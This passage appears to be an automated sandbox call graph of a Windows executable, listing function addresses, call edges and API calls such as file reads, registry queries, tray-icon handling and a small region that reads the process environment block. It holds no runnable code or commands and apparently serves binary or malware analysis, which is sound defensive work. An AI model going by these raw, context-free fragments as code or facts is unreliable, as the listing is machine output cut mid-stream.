e74dd0 98568->98570 98569->98567 98569->98568 98571 e90ff6 Mailbox 59 API calls 98570->98571 98572 e74de5 98571->98572 98573 e7538e 59 API calls 98572->98573 98574 e74df1 _memmove 98573->98574 98575 e74e2c 98574->98575 98577 e74f21 98574->98577 98578 e74ee9 98574->98578 98576 e75027 69 API calls 98575->98576 98582 e74e35 98576->98582 98779 ed9ba5 95 API calls 98577->98779 98768 e74fe9 CreateStreamOnHGlobal 98578->98768 98581 e7506b 74 API calls 98581->98582 98582->98581 98584 e74ec9 98582->98584 98585 eadcd0 98582->98585 98774 e75045 98582->98774 98584->98424 98586 e75045 85 API calls 98585->98586 98587 eadce4 98586->98587 98588 e7506b 74 API calls 98587->98588 98588->98584 98590 e7507d 98589->98590 98591 eaddf6 98589->98591 98803 e95812 98590->98803 98594 ed9393 99001 ed91e9 98594->99001 98596 ed93a9 98596->98432 98598 e75036 98597->98598 98599 eaddb9 98597->98599 99006 e95e90 98598->99006 98601 e7503e 98603 e74d2e 98602->98603 98604 e74d6a LoadLibraryA 98602->98604 98603->98556 98603->98557 98604->98603 98605 e74d7b GetProcAddress 98604->98605 98605->98603 98607 e954ac _fseek 98606->98607 98608 e954bf 98607->98608 98611 e954f0 98607->98611 98655 e98d68 58 API calls __getptd_noexit 98608->98655 98610 e954c4 98656 e98ff6 9 API calls _fseek 98610->98656 98625 ea0738 98611->98625 98614 e954f5 98615 e9550b 98614->98615 98616 e954fe 98614->98616 98618 e95535 98615->98618 98619 e95515 98615->98619 98657 e98d68 58 API calls __getptd_noexit 98616->98657 98640 ea0857 98618->98640 98658 e98d68 58 API calls __getptd_noexit 98619->98658 98621 e954cf _fseek @_EH4_CallFilterFunc@8 98621->98562 98626 ea0744 _fseek 98625->98626 98627 e99e4b __lock 58 API calls 98626->98627 98637 ea0752 98627->98637 98628 ea07c6 98660 ea084e 98628->98660 98629 ea07cd 98665 e98a5d 58 API calls 2 library calls 98629->98665 98632 ea0843 _fseek 98632->98614 98633 ea07d4 98633->98628 98666 e9a06b InitializeCriticalSectionAndSpinCount 98633->98666 98636 e99ed3 __mtinitlocknum 58 API calls 98636->98637 98637->98628 98637->98629 98637->98636 98663 e96e8d 59 API calls __lock 98637->98663 98664 e96ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98637->98664 98638 ea07fa EnterCriticalSection 98638->98628 98649 ea0877 __wopenfile 98640->98649 98641 ea0891 98671 e98d68 58 API calls __getptd_noexit 98641->98671 98642 ea0a4c 98642->98641 98646 ea0aaf 98642->98646 98644 ea0896 98672 e98ff6 9 API calls _fseek 98644->98672 98668 ea87f1 98646->98668 98647 e95540 98659 e95562 LeaveCriticalSection LeaveCriticalSection __wfsopen 98647->98659 98649->98641 98649->98642 98673 e93a0b 60 API calls 2 library calls 98649->98673 98651 ea0a45 98651->98642 98674 e93a0b 60 API calls 2 library calls 98651->98674 98653 ea0a64 98653->98642 98675 e93a0b 60 API calls 2 library calls 98653->98675 98655->98610 98656->98621 98657->98621 98658->98621 98659->98621 98667 e99fb5 LeaveCriticalSection 98660->98667 98662 ea0855 98662->98632 98663->98637 98664->98637 98665->98633 98666->98638 98667->98662 98676 ea7fd5 98668->98676 98670 ea880a 98670->98647 98671->98644 98672->98647 98673->98651 98674->98653 98675->98642 98677 ea7fe1 _fseek 98676->98677 98678 ea7ff7 98677->98678 98680 ea802d 98677->98680 98761 e98d68 58 API calls __getptd_noexit 98678->98761 98687 ea809e 98680->98687 98681 ea7ffc 98762 e98ff6 9 API calls _fseek 98681->98762 98684 ea8049 98763 ea8072 LeaveCriticalSection __unlock_fhandle 98684->98763 98686 ea8006 _fseek 98686->98670 98688 ea80be 98687->98688 98689 e9471a __wsopen_nolock 58 API calls 98688->98689 98691 ea80da 98689->98691 98690 e99006 __invoke_watson 8 API calls 98692 ea87f0 98690->98692 98693 ea8114 98691->98693 98701 ea8137 98691->98701 98709 ea8211 98691->98709 98694 ea7fd5 __wsopen_helper 103 API calls 98692->98694 98695 e98d34 __close 58 API calls 98693->98695 98696 ea880a 98694->98696 98697 ea8119 98695->98697 98696->98684 98698 e98d68 _fseek 58 API calls 98697->98698 98699 ea8126 98698->98699 98702 e98ff6 _fseek 9 API calls 98699->98702 98700 ea81f5 98703 e98d34 __close 58 API calls 98700->98703 98701->98700 98704 ea81d3 98701->98704 98729 ea8130 98702->98729 98705 ea81fa 98703->98705 98710 e9d4d4 __alloc_osfhnd 61 API calls 98704->98710 98706 e98d68 _fseek 58 API calls 98705->98706 98707 ea8207 98706->98707 98708 e98ff6 _fseek 9 API calls 98707->98708 98708->98709 98709->98690 98711 ea82a1 98710->98711 98712 ea82ab 98711->98712 98713 ea82ce 98711->98713 98714 e98d34 __close 58 API calls 98712->98714 98715 ea7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98713->98715 98716 ea82b0 98714->98716 98726 ea82f0 98715->98726 98717 e98d68 _fseek 58 API calls 98716->98717 98719 ea82ba 98717->98719 98718 ea836e GetFileType 98720 ea83bb 98718->98720 98721 ea8379 GetLastError 98718->98721 98724 e98d68 _fseek 58 API calls 98719->98724 98732 e9d76a __set_osfhnd 59 API calls 98720->98732 98725 e98d47 __dosmaperr 58 API calls 98721->98725 98722 ea833c GetLastError 98723 e98d47 __dosmaperr 58 API calls 98722->98723 98728 ea8361 98723->98728 98724->98729 98730 ea83a0 CloseHandle 98725->98730 98726->98718 98726->98722 98727 ea7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98726->98727 98731 ea8331 98727->98731 98734 e98d68 _fseek 58 API calls 98728->98734 98729->98684 98730->98728 98733 ea83ae 98730->98733 98731->98718 98731->98722 98738 ea83d9 98732->98738 98735 e98d68 _fseek 58 API calls 98733->98735 98734->98709 98736 ea83b3 98735->98736 98736->98728 98737 ea8594 98737->98709 98740 ea8767 CloseHandle 98737->98740 98738->98737 98739 ea1b11 __lseeki64_nolock 60 API calls 98738->98739 98757 ea845a 98738->98757 98741 ea8443 98739->98741 98742 ea7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98740->98742 98744 e98d34 __close 58 API calls 98741->98744 98741->98757 98743 ea878e 98742->98743 98745 ea87c2 98743->98745 98746 ea8796 GetLastError 98743->98746 98744->98757 98745->98709 98747 e98d47 __dosmaperr 58 API calls 98746->98747 98749 ea87a2 98747->98749 98748 ea848c 98752 ea99f2 __chsize_nolock 82 API calls 98748->98752 98748->98757 98753 e9d67d __free_osfhnd 59 API calls 98749->98753 98750 ea10ab 70 API calls __read_nolock 98750->98757 98751 ea0d2d __close_nolock 61 API calls 98751->98757 98752->98748 98753->98745 98754 e9dac6 __write 78 API calls 98754->98757 98755 ea8611 98756 ea0d2d __close_nolock 61 API calls 98755->98756 98758 ea8618 98756->98758 98757->98737 98757->98748 98757->98750 98757->98751 98757->98754 98757->98755 98759 ea1b11 60 API calls __lseeki64_nolock 98757->98759 98760 e98d68 _fseek 58 API calls 98758->98760 98759->98757 98760->98709 98761->98681 98762->98686 98763->98686 98765 e74ce1 98764->98765 98766 e74d9d LoadLibraryA 98764->98766 98765->98566 98765->98569 98766->98765 98767 e74dae GetProcAddress 98766->98767 98767->98765 98769 e75003 FindResourceExW 98768->98769 98773 e75020 98768->98773 98770 eadd5c LoadResource 98769->98770 98769->98773 98771 eadd71 SizeofResource 98770->98771 98770->98773 98772 eadd85 LockResource 98771->98772 98771->98773 98772->98773 98773->98575 98775 e75054 98774->98775 98776 eaddd4 98774->98776 98780 e95a7d 98775->98780 98778 e75062 98778->98582 98779->98575 98781 e95a89 _fseek 98780->98781 98782 e95a9b 98781->98782 98783 e95ac1 98781->98783 98793 e98d68 58 API calls __getptd_noexit 98782->98793 98795 e96e4e 98783->98795 98786 e95aa0 98794 e98ff6 9 API calls _fseek 98786->98794 98790 e95ad6 98802 e95af8 LeaveCriticalSection LeaveCriticalSection __wfsopen 98790->98802 98792 e95aab _fseek 98792->98778 98793->98786 98794->98792 98796 e96e5e 98795->98796 98797 e96e80 EnterCriticalSection 98795->98797 98796->98797 98798 e96e66 98796->98798 98799 e95ac7 98797->98799 98800 e99e4b __lock 58 API calls 98798->98800 98801 e959ee 83 API calls 4 library calls 98799->98801 98800->98799 98801->98790 98802->98792 98806 e9582d 98803->98806 98805 e7508e 98805->98594 98808 e95839 _fseek 98806->98808 98807 e95874 _fseek 98807->98805 98808->98807 98809 e9587c 98808->98809 98810 e9584f _memset 98808->98810 98811 e96e4e __lock_file 59 API calls 98809->98811 98833 e98d68 58 API calls __getptd_noexit 98810->98833 98813 e95882 98811->98813 98819 e9564d 98813->98819 98814 e95869 98834 e98ff6 9 API calls _fseek 98814->98834 98822 e95668 _memset 98819->98822 98826 e95683 98819->98826 98820 e95673 98931 e98d68 58 API calls __getptd_noexit 98820->98931 98822->98820 98822->98826 98827 e956c3 98822->98827 98823 e95678 98932 e98ff6 9 API calls _fseek 98823->98932 98835 e958b6 LeaveCriticalSection LeaveCriticalSection __wfsopen 98826->98835 98827->98826 98828 e957d4 _memset 98827->98828 98836 e94916 98827->98836 98843 ea10ab 98827->98843 98911 ea0df7 98827->98911 98933 ea0f18 58 API calls 3 library calls 98827->98933 98934 e98d68 58 API calls __getptd_noexit 98828->98934 98833->98814 98834->98807 98835->98807 98837 e94920 98836->98837 98838 e94935 98836->98838 98935 e98d68 58 API calls __getptd_noexit 98837->98935 98838->98827 98840 e94925 98936 e98ff6 9 API calls _fseek 98840->98936 98842 e94930 98842->98827 98844 ea10cc 98843->98844 98845 ea10e3 98843->98845 98946 e98d34 58 API calls __getptd_noexit 98844->98946 98847 ea181b 98845->98847 98851 ea111d 98845->98851 98962 e98d34 58 API calls __getptd_noexit 98847->98962 98848 ea10d1 98947 e98d68 58 API calls __getptd_noexit 98848->98947 98853 ea1125 98851->98853 98859 ea113c 98851->98859 98852 ea1820 98963 e98d68 58 API calls __getptd_noexit 98852->98963 98948 e98d34 58 API calls __getptd_noexit 98853->98948 98856 ea1131 98964 e98ff6 9 API calls _fseek 98856->98964 98857 ea112a 98949 e98d68 58 API calls __getptd_noexit 98857->98949 98860 ea1151 98859->98860 98862 ea116b 98859->98862 98864 ea1189 98859->98864 98891 ea10d8 98859->98891 98950 e98d34 58 API calls __getptd_noexit 98860->98950 98862->98860 98867 ea1176 98862->98867 98951 e98a5d 58 API calls 2 library calls 98864->98951 98937 ea5ebb 98867->98937 98868 ea1199 98869 ea11bc 98868->98869 98870 ea11a1 98868->98870 98954 ea1b11 60 API calls 3 library calls 98869->98954 98952 e98d68 58 API calls __getptd_noexit 98870->98952 98871 ea128a 98873 ea1303 ReadFile 98871->98873 98878 ea12a0 GetConsoleMode 98871->98878 98876 ea17e3 GetLastError 98873->98876 98877 ea1325 98873->98877 98875 ea11a6 98953 e98d34 58 API calls __getptd_noexit 98875->98953 98880 ea17f0 98876->98880 98881 ea12e3 98876->98881 98877->98876 98885 ea12f5 98877->98885 98882 ea1300 98878->98882 98883 ea12b4 98878->98883 98960 e98d68 58 API calls __getptd_noexit 98880->98960 98893 ea12e9 98881->98893 98955 e98d47 58 API calls 3 library calls 98881->98955 98882->98873 98883->98882 98886 ea12ba ReadConsoleW 98883->98886 98885->98893 98894 ea135a 98885->98894 98903 ea15c7 98885->98903 98886->98885 98888 ea12dd GetLastError 98886->98888 98887 ea17f5 98961 e98d34 58 API calls __getptd_noexit 98887->98961 98888->98881 98891->98827 98892 e92f95 _free 58 API calls 98892->98891 98893->98891 98893->98892 98895 ea13c6 ReadFile 98894->98895 98901 ea1447 98894->98901 98897 ea13e7 GetLastError 98895->98897 98910 ea13f1 98895->98910 98897->98910 98898 ea1504 98905 ea14b4 MultiByteToWideChar 98898->98905 98958 ea1b11 60 API calls 3 library calls 98898->98958 98899 ea14f4 98957 e98d68 58 API calls __getptd_noexit 98899->98957 98900 ea16cd ReadFile 98904 ea16f0 GetLastError 98900->98904 98908 ea16fe 98900->98908 98901->98893 98901->98898 98901->98899 98901->98905 98903->98893 98903->98900 98904->98908 98905->98888 98905->98893 98908->98903 98959 ea1b11 60 API calls 3 library calls 98908->98959 98910->98894 98956 ea1b11 60 API calls 3 library calls 98910->98956 98912 ea0e02 98911->98912 98913 ea0e17 98911->98913 98998 e98d68 58 API calls __getptd_noexit 98912->98998 98918 ea0e4c 98913->98918 98925 ea0e12 98913->98925 99000 ea6234 58 API calls __malloc_crt 98913->99000 98915 ea0e07 98999 e98ff6 9 API calls _fseek 98915->98999 98919 e94916 __ftell_nolock 58 API calls 98918->98919 98920 ea0e60 98919->98920 98965 ea0f97 98920->98965 98922 ea0e67 98923 e94916 __ftell_nolock 58 API calls 98922->98923 98922->98925 98924 ea0e8a 98923->98924 98924->98925 98926 e94916 __ftell_nolock 58 API calls 98924->98926 98925->98827 98927 ea0e96 98926->98927 98927->98925 98928 e94916 __ftell_nolock 58 API calls 98927->98928 98929 ea0ea3 98928->98929 98930 e94916 __ftell_nolock 58 API calls 98929->98930 98930->98925 98931->98823 98932->98826 98933->98827 98934->98823 98935->98840 98936->98842 98938 ea5ed3 98937->98938 98939 ea5ec6 98937->98939 98941 ea5edf 98938->98941 98942 e98d68 _fseek 58 API calls 98938->98942 98940 e98d68 _fseek 58 API calls 98939->98940 98943 ea5ecb 98940->98943 98941->98871 98944 ea5f00 98942->98944 98943->98871 98945 e98ff6 _fseek 9 API calls 98944->98945 98945->98943 98946->98848 98947->98891 98948->98857 98949->98856 98950->98857 98951->98868 98952->98875 98953->98891 98954->98867 98955->98893 98956->98910 98957->98893 98958->98905 98959->98908 98960->98887 98961->98893 98962->98852 98963->98856 98964->98891 98966 ea0fa3 _fseek 98965->98966 98967 ea0fb0 98966->98967 98968 ea0fc7 98966->98968 98969 e98d34 __close 58 API calls 98967->98969 98970 ea108b 98968->98970 98973 ea0fdb 98968->98973 98972 ea0fb5 98969->98972 98971 e98d34 __close 58 API calls 98970->98971 98982 ea0ffe 98971->98982 98974 e98d68 _fseek 58 API calls 98972->98974 98975 ea0ff9 98973->98975 98976 ea1006 98973->98976 98993 ea0fbc _fseek 98974->98993 98977 e98d34 __close 58 API calls 98975->98977 98978 ea1028 98976->98978 98979 ea1013 98976->98979 98977->98982 98980 e9d446 ___lock_fhandle 59 API calls 98978->98980 98983 e98d34 __close 58 API calls 98979->98983 98985 ea102e 98980->98985 98981 e98d68 _fseek 58 API calls 98986 ea1020 98981->98986 98982->98981 98984 ea1018 98983->98984 98987 e98d68 _fseek 58 API calls 98984->98987 98988 ea1041 98985->98988 98989 ea1054 98985->98989 98991 e98ff6 _fseek 9 API calls 98986->98991 98987->98986 98990 ea10ab __read_nolock 70 API calls 98988->98990 98992 e98d68 _fseek 58 API calls 98989->98992 98994 ea104d 98990->98994 98991->98993 98995 ea1059 98992->98995 98993->98922 98997 ea1083 __read LeaveCriticalSection 98994->98997 98996 e98d34 __close 58 API calls 98995->98996 98996->98994 98997->98993 98998->98915 98999->98925 99000->98918 99004 e9543a GetSystemTimeAsFileTime 99001->99004 99003 ed91f8 99003->98596 99005 e95468 __aulldiv 99004->99005 99005->99003 99007 e95e9c _fseek 99006->99007 99008 e95eae 99007->99008 99009 e95ec3 99007->99009 99020 e98d68 58 API calls __getptd_noexit 99008->99020 99011 e96e4e __lock_file 59 API calls 99009->99011 99013 e95ec9 99011->99013 99012 e95eb3 99021 e98ff6 9 API calls _fseek 99012->99021 99022 e95b00 67 API calls 5 library calls 99013->99022 99016 e95ed4 99023 e95ef4 LeaveCriticalSection LeaveCriticalSection __wfsopen 99016->99023 99018 e95ee6 99019 e95ebe _fseek 99018->99019 99019->98601 99020->99012 99021->99019 99022->99016 99023->99018 99024->98473 99025->98475 99026->98526 99061 ed99d2 __tzset_nolock _wcscmp 99056->99061 99057 e7506b 74 API calls 99057->99061 99058 ed949a 99058->98507 99062 e9432e 58 API calls __wsplitpath_helper 99058->99062 99059 ed9393 GetSystemTimeAsFileTime 99059->99061 99060 e75045 85 API calls 99060->99061 99061->99057 99061->99058 99061->99059 99061->99060 99062->98509 99063->98517 99383 ec665e 99382->99383 99384 ec6641 99382->99384 99383->97836 99384->99383 99386 ec6621 59 API calls Mailbox 99384->99386 99386->99384 99387 e7e70b 99390 e7d260 99387->99390 99389 e7e719 99391 e7d4dd 99390->99391 99392 e7d27d 99390->99392 99405 e7d6ab 99391->99405 99443 eda0b5 89 API calls 4 library calls 99391->99443 99393 eb2abb 99392->99393 99394 eb2b0a 99392->99394 99398 e7d2a4 99392->99398 99397 eb2abe 99393->99397 99403 eb2ad9 99393->99403 99438 eea6fb 341 API calls __cinit 99394->99438 99397->99398 99399 eb2aca 99397->99399 99398->99391 99400 e92f80 __cinit 67 API calls 99398->99400 99398->99405 99407 e7d594 99398->99407 99411 eb2c26 99398->99411 99421 e7a000 341 API calls 99398->99421 99422 e781a7 59 API calls 99398->99422 99424 e788a0 68 API calls __cinit 99398->99424 99425 e786a2 68 API calls 99398->99425 99426 e78620 99398->99426 99431 e7859a 68 API calls 99398->99431 99432 e7d0dc 341 API calls 99398->99432 99433 e79f3a 59 API calls Mailbox 99398->99433 99434 e7d060 89 API calls 99398->99434 99435 e7cedd 341 API calls 99398->99435 99439 e78bb2 68 API calls 99398->99439 99440 e79e9c 60 API calls Mailbox 99398->99440 99441 ec6d03 60 API calls 99398->99441 99436 eead0f 341 API calls 99399->99436 99400->99398 99403->99391 99437 eeb1b7 341 API calls 3 library calls 99403->99437 99404 eb2cdf 99404->99404 99405->99389 99430 e78bb2 68 API calls 99407->99430 99410 e7d5a3 99410->99389 99442 eeaa66 89 API calls 99411->99442 99421->99398 99422->99398 99424->99398 99425->99398 99427 e7862b 99426->99427 99429 e78652 99427->99429 99444 e78b13 69 API calls Mailbox 99427->99444 99429->99398 99430->99410 99431->99398 99432->99398 99433->99398 99434->99398 99435->99398 99436->99405 99437->99391 99438->99398 99439->99398 99440->99398 99441->99398 99442->99391 99443->99404 99444->99429 99445 e7568a 99446 e75c18 59 API calls 99445->99446 99447 e7569c 99446->99447 99448 e75632 61 API calls 99447->99448 99449 e756aa 99448->99449 99451 e756ba Mailbox 99449->99451 99452 e781c1 61 API calls Mailbox 99449->99452 99452->99451 99453 eb0226 99462 e7ade2 Mailbox 99453->99462 99455 eb0c86 99456 ec66f4 Mailbox 59 API calls 99455->99456 99457 eb0c8f 99456->99457 99459 eb00e0 VariantClear 99459->99462 99460 e7b6c1 99470 eda0b5 89 API calls 4 library calls 99460->99470 99462->99455 99462->99457 99462->99459 99462->99460 99463 ee474d 341 API calls 99462->99463 99464 edd2e5 101 API calls 99462->99464 99465 eee237 130 API calls 99462->99465 99466 e82123 95 API calls 99462->99466 99467 edd2e6 101 API calls 99462->99467 99468 e79df0 59 API calls Mailbox 99462->99468 99469 ec7405 59 API calls 99462->99469 99463->99462 99464->99462 99465->99462 99466->99462 99467->99462 99468->99462 99469->99462 99470->99455 99471 e71016 99476 e74ad2 99471->99476 99474 e92f80 __cinit 67 API calls 99475 e71025 99474->99475 99477 e90ff6 Mailbox 59 API calls 99476->99477 99478 e74ada 99477->99478 99479 e7101b 99478->99479 99483 e74a94 99478->99483 99479->99474 99484 e74aaf 99483->99484 99485 e74a9d 99483->99485 99487 e74afe 99484->99487 99486 e92f80 __cinit 67 API calls 99485->99486 99486->99484 99488 e777c7 59 API calls 99487->99488 99489 e74b16 GetVersionExW 99488->99489 99490 e77d2c 59 API calls 99489->99490 99491 e74b59 99490->99491 99492 e77e8c 59 API calls 99491->99492 99495 e74b86 99491->99495 99493 e74b7a 99492->99493 99515 e77886 99493->99515 99496 e74bf1 GetCurrentProcess IsWow64Process 99495->99496 99497 eadc8d 99495->99497 99498 e74c0a 99496->99498 99499 e74c20 99498->99499 99500 e74c89 GetSystemInfo 99498->99500 99511 e74c95 99499->99511 99501 e74c56 99500->99501 99501->99479 99504 e74c32 99507 e74c95 2 API calls 99504->99507 99505 e74c7d GetSystemInfo 99506 e74c47 99505->99506 99506->99501 99508 e74c4d FreeLibrary 99506->99508 99509 e74c3a GetNativeSystemInfo 99507->99509 99508->99501 99509->99506 99512 e74c2e 99511->99512 99513 e74c9e LoadLibraryA 99511->99513 99512->99504 99512->99505 99513->99512 99514 e74caf GetProcAddress 99513->99514 99514->99512 99516 e77894 99515->99516 99517 e77e8c 59 API calls 99516->99517 99518 e778a4 99517->99518 99518->99495 99519 e71055 99524 e72649 99519->99524 99522 e92f80 __cinit 67 API calls 99523 e71064 99522->99523 99525 e777c7 59 API calls 99524->99525 99526 e726b7 99525->99526 99531 e73582 99526->99531 99529 e72754 99530 e7105a 99529->99530 99534 e73416 59 API calls 2 library calls 99529->99534 99530->99522 99535 e735b0 99531->99535 99534->99529 99536 e735a1 99535->99536 99537 e735bd 99535->99537 99536->99529 99537->99536 99538 e735c4 RegOpenKeyExW 99537->99538 99538->99536 99539 e735de RegQueryValueExW 99538->99539 99540 e73614 RegCloseKey 99539->99540 99541 e735ff 99539->99541 99540->99536 99541->99540 99542 e73633 99543 e7366a 99542->99543 99544 e736e7 99543->99544 99545 e73688 99543->99545 99581 e736e5 99543->99581 99547 ead31c 99544->99547 99548 e736ed 99544->99548 99549 e73695 99545->99549 99550 e7375d PostQuitMessage 99545->99550 99546 e736ca DefWindowProcW 99584 e736d8 99546->99584 99592 e811d0 10 API calls Mailbox 99547->99592 99554 e73715 SetTimer RegisterWindowMessageW 99548->99554 99555 e736f2 99548->99555 99551 ead38f 99549->99551 99552 e736a0 99549->99552 99550->99584 99607 ed2a16 71 API calls _memset 99551->99607 99556 e73767 99552->99556 99557 e736a8 99552->99557 99558 e7373e CreatePopupMenu 99554->99558 99554->99584 99561 ead2bf 99555->99561 99562 e736f9 KillTimer 99555->99562 99590 e74531 64 API calls _memset 99556->99590 99563 e736b3 99557->99563 99564 ead374 99557->99564 99558->99584 99560 ead343 99593 e811f3 341 API calls Mailbox 99560->99593 99568 ead2f8 MoveWindow 99561->99568 99569 ead2c4 99561->99569 99587 e744cb Shell_NotifyIconW _memset 99562->99587 99571 e736be 99563->99571 99572 e7374b 99563->99572 99564->99546 99606 ec817e 59 API calls Mailbox 99564->99606 99565 ead3a1 99565->99546 99565->99584 99568->99584 99574 ead2c8 99569->99574 99575 ead2e7 SetFocus 99569->99575 99571->99546 99594 e744cb Shell_NotifyIconW _memset 99571->99594 99589 e745df 81 API calls _memset 99572->99589 99573 e7375b 99573->99584 99574->99571 99578 ead2d1 99574->99578 99575->99584 99576 e7370c 99588 e73114 DeleteObject DestroyWindow Mailbox 99576->99588 99591 e811d0 10 API calls Mailbox 99578->99591 99581->99546 99585 ead368 99595 e743db 99585->99595 99587->99576 99588->99584 99589->99573 99590->99573 99591->99584 99592->99560 99593->99571 99594->99585 99596 e74406 _memset 99595->99596 99608 e74213 99596->99608 99600 e744a5 Shell_NotifyIconW 99602 e744b3 99600->99602 99601 e744c1 Shell_NotifyIconW 99601->99602 99612 e7410d 99602->99612 99603 e7448b 99603->99600 99603->99601 99605 e744ba 99605->99581 99606->99581 99607->99565 99609 e74227 99608->99609 99610 ead638 99608->99610 99609->99603 99634 ed3226 62 API calls _W_store_winword 99609->99634 99610->99609 99611 ead641 DestroyIcon 99610->99611 99611->99609 99613 e74200 Mailbox 99612->99613 99614 e74129 99612->99614 99613->99605 99615 e77b76 59 API calls 99614->99615 99616 e74137 99615->99616 99617 e74144 99616->99617 99618 ead5dd LoadStringW 99616->99618 99619 e77d2c 59 API calls 99617->99619 99621 ead5f7 99618->99621 99620 e74159 99619->99620 99620->99621 99622 e7416a 99620->99622 99623 e77c8e 59 API calls 99621->99623 99624 e74205 99622->99624 99625 e74174 99622->99625 99628 ead601 99623->99628 99626 e781a7 59 API calls 99624->99626 99627 e77c8e 59 API calls 99625->99627 99631 e7417e _memset _wcscpy 99626->99631 99627->99631 99629 e77e0b 59 API calls 99628->99629 99628->99631 99630 ead623 99629->99630 99633 e77e0b 59 API calls 99630->99633 99632 e741e6 Shell_NotifyIconW 99631->99632 99632->99613 99633->99631 99634->99603 99635 e523b0 99649 e50000 99635->99649 99637 e5245c 99652 e522a0 99637->99652 99655 e53480 GetPEB 99649->99655 99651 e5068b 99651->99637 99653 e522a9 Sleep 99652->99653 99654 e522b7 99653->99654 99656 e534aa 99655->99656 99656->99651 99657 e97e93 99658 e97e9f _fseek 99657->99658 99694 e9a048 GetStartupInfoW 99658->99694 99661 e97ea4 99696 e98dbc GetProcessHeap 99661->99696 99662 e97efc 99663 e97f07 99662->99663 99779 e97fe3 58 API calls 3 library calls 99662->99779 99697 e99d26 99663->99697 99666 e97f0d 99668 e97f18 __RTC_Initialize 99666->99668 99780 e97fe3 58 API calls 3 library calls 99666->99780 99718 e9d812 99668->99718 99670 e97f27 99671 e97f33 GetCommandLineW 99670->99671 99781 e97fe3 58 API calls 3 library calls 99670->99781 99737 ea5173 GetEnvironmentStringsW 99671->99737 99675 e97f32 99675->99671 99677 e97f4d 99678 e97f58 99677->99678 99782 e932f5 58 API calls 3 library calls 99677->99782 99747 ea4fa8 99678->99747 99681 e97f5e 99682 e97f69 99681->99682 99783 e932f5 58 API calls 3 library calls 99681->99783 99761 e9332f 99682->99761 99685 e97f71 99686 e97f7c __wwincmdln 99685->99686 99784 e932f5 58 API calls 3 library calls 99685->99784 99767 e7492e 99686->99767 99689 e97f90 99690 e97f9f 99689->99690 99785 e93598 58 API calls _doexit 99689->99785 99786 e93320 58 API calls _doexit 99690->99786 99693 e97fa4 _fseek 99695 e9a05e 99694->99695 99695->99661 99696->99662 99787 e933c7 36 API calls 2 library calls 99697->99787 99699 e99d2b 99788 e99f7c InitializeCriticalSectionAndSpinCount __getstream 99699->99788 99701 e99d30 99702 e99d34 99701->99702 99790 e99fca TlsAlloc 99701->99790 99789 e99d9c 61 API calls 2 library calls 99702->99789 99705 e99d39 99705->99666 99706 e99d46 99706->99702 99707 e99d51 99706->99707 99791 e98a15 99707->99791 99710 e99d93 99799 e99d9c 61 API calls 2 library calls 99710->99799 99713 e99d72 99713->99710 99715 e99d78 99713->99715 99714 e99d98 99714->99666 99798 e99c73 58 API calls 4 library calls 99715->99798 99717 e99d80 GetCurrentThreadId 99717->99666 99719 e9d81e _fseek 99718->99719 99720 e99e4b __lock 58 API calls 99719->99720 99721 e9d825 99720->99721 99722 e98a15 __calloc_crt 58 API calls 99721->99722 99725 e9d836 99722->99725 99723 e9d841 _fseek @_EH4_CallFilterFunc@8 99723->99670 99724 e9d8a1 GetStartupInfoW 99731 e9d9e5 99724->99731 99732 e9d8b6 99724->99732 99725->99723 99725->99724 99726 e9daad 99813 e9dabd LeaveCriticalSection _doexit 99726->99813 99728 e98a15 __calloc_crt 58 API calls 99728->99732 99729 e9da32 GetStdHandle 99729->99731 99730 e9da45 GetFileType 99730->99731 99731->99726 99731->99729 99731->99730 99812 e9a06b InitializeCriticalSectionAndSpinCount 99731->99812 99732->99728 99732->99731 99734 e9d904 99732->99734 99733 e9d938 GetFileType 99733->99734 99734->99731 99734->99733 99811 e9a06b InitializeCriticalSectionAndSpinCount 99734->99811 99738 e97f43 99737->99738 99739 ea5184 99737->99739 99743 ea4d6b GetModuleFileNameW 99738->99743 99814 e98a5d 58 API calls 2 library calls 99739->99814 99741 ea51aa _memmove 99742 ea51c0 FreeEnvironmentStringsW 99741->99742 99742->99738 99744 ea4d9f _wparse_cmdline 99743->99744 99746 ea4ddf _wparse_cmdline 99744->99746 99815 e98a5d 58 API calls 2 library calls 99744->99815 99746->99677 99748 ea4fb9 99747->99748 99749 ea4fc1 __NMSG_WRITE 99747->99749 99748->99681 99750 e98a15 __calloc_crt 58 API calls 99749->99750 99751 ea4fea __NMSG_WRITE 99750->99751 99751->99748 99753 e98a15 __calloc_crt 58 API calls 99751->99753 99754 ea5041 99751->99754 99755 ea5066 99751->99755 99758 ea507d 99751->99758 99816 ea4857 58 API calls _fseek 99751->99816 99752 e92f95 _free 58 API calls 99752->99748 99753->99751 99754->99752 99757 e92f95 _free 58 API calls 99755->99757 99757->99748 99817 e99006 IsProcessorFeaturePresent 99758->99817 99760 ea5089 99760->99681 99762 e9333b __IsNonwritableInCurrentImage 99761->99762 99832 e9a711 99762->99832 99764 e93359 __initterm_e 99765 e92f80 __cinit 67 API calls 99764->99765 99766 e93378 _doexit __IsNonwritableInCurrentImage 99764->99766 99765->99766 99766->99685 99768 e74948 99767->99768 99778 e749e7 99767->99778 99769 e74982 IsThemeActive 99768->99769 99835 e935ac 99769->99835 99773 e749ae 99847 e74a5b SystemParametersInfoW SystemParametersInfoW 99773->99847 99775 e749ba 99848 e73b4c 99775->99848 99778->99689 99779->99663 99780->99668 99781->99675 99785->99690 99786->99693 99787->99699 99788->99701 99789->99705 99790->99706 99792 e98a1c 99791->99792 99794 e98a57 99792->99794 99796 e98a3a 99792->99796 99800 ea5446 99792->99800 99794->99710 99797 e9a026 TlsSetValue 99794->99797 99796->99792 99796->99794 99808 e9a372 Sleep 99796->99808 99797->99713 99798->99717 99799->99714 99801 ea5451 99800->99801 99807 ea546c 99800->99807 99802 ea545d 99801->99802 99801->99807 99809 e98d68 58 API calls __getptd_noexit 99802->99809 99804 ea547c HeapAlloc 99806 ea5462 99804->99806 99804->99807 99806->99792 99807->99804 99807->99806 99810 e935e1 DecodePointer 99807->99810 99808->99796 99809->99806 99810->99807 99811->99734 99812->99731 99813->99723 99814->99741 99815->99746 99816->99751 99818 e99011 99817->99818 99823 e98e99 99818->99823 99822 e9902c 99822->99760 99825 e98eb3 _memset ___raise_securityfailure 99823->99825 99824 e98ed3 IsDebuggerPresent 99831 e9a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 99824->99831 99825->99824 99827 e9c836 __wtof_l 6 API calls 99829 e98fba 99827->99829 99828 e98f97 ___raise_securityfailure 99828->99827 99830 e9a380 